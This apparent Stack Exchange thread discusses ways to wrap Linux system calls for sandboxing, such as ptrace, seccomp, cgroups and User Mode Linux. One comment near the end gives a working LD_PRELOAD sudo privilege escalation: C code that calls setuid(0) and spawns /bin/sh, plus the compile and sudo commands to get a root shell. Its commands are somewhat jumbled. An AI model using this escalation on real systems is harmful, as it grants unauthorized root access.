# Wrapping system call (in reliable and secure way)

Tags: operating-systems, linux, sandbox

It there reliable method of "wrapping" system calls under Linux ?
(Like LD_PRELOAD for wrapping shared library function calls.)

Is there reliable, secure method of "wrapping" system calls (and, maybe receiving signals), that process can not break (assuming proper Linux implementation) ?

Comment: [Similar, but different question about "monitoring" system call](http://security.stackexchange.com/questions/8485/monitoring-system-calls-and-signals)

Answer (score 5):

Yes.  You use system call interposition.  One portable method is to use ptrace, though this can introduce a non-trivial performance overhead as it forces a context switch on every system call.  On Solaris, you can use /proc; /proc lets you specify the subset of system calls that you are interested in wrapping, which lets you achieve better performance at the cost of compatibility.

Take a look at Plash, Systrace, and Subterfugue, to see some worked systems that use these sorts of methods.  Also look at Chrome's sandbox, which uses a variety of mechanisms (including seccomp on Linux).

Comment: Thanks, your tips sounds interesting. I knew some of them, I'd like to add about [PinkTrace](http://dev.exherbo.org/~alip/pinktrace/) - I've found it interesting programming library. What is missing puzzle to me in all those solutions : how to change brk calls in NOP, and reserve proper amount of memory before it is run.

Comment: Thanks for info about Solaris  /proc. I haven't knew about this feaure. :)

Answer (score 2):

I would use one of the many virtualization technologies available. If you only want to restrict what resources are available to a particular process, a jail mechanism such as [cgroups](http://en.wikipedia.org/wiki/Cgroups) should be enough. For more fine-tuning of what happens when the process executes a system call, check out [User Mode Linux](http://en.wikipedia.org/wiki/User-mode_Linux).

Comment: You can still generate a C program shell.c in /temp which would make your wrapper somewhat useless `#include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/sh"); }` And when compiled it to generate a shared object with .so extension and likewise .dll file in Windows operating system.
afterward you can gain root `gcc -fPIC -shared -o shell.so shell.c -nostartfiles ls -al shell.so sudo LD_PRELOAD=/tmp/shell.so find whoami > root`

Comment: @Boschko What wrapper are you talking about???